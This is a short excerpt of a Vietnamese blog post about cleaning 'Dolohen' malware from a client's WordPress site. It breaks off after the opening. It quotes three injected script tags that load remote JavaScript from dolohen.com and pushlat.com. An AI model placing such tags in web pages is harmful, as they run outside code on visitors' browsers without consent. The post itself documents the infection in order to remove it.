Xóa bỏ Dolohen trong web WordPress bị Malware

Trong khi gần đây duy trì một trang web wordpress cho một khách hàng, tôi đã bắt gặp một đoạn mã kỳ lạ khiến tôi chú ý: <script type=”text/javascript” src=”https://dolohen.com/apu.php?zoneid=2285981″> <script type=”text/javascript” src=”//dolohen.com/apu.php?zoneid=2239327″></script> <script src=”//pushlat.com/ntfc.php?p=2239332″ data-cfasync=”false” async></script> Tôi đã có thể xem tập lệnh được tham chiếu này thông qua trình thu thập dữ liệu […]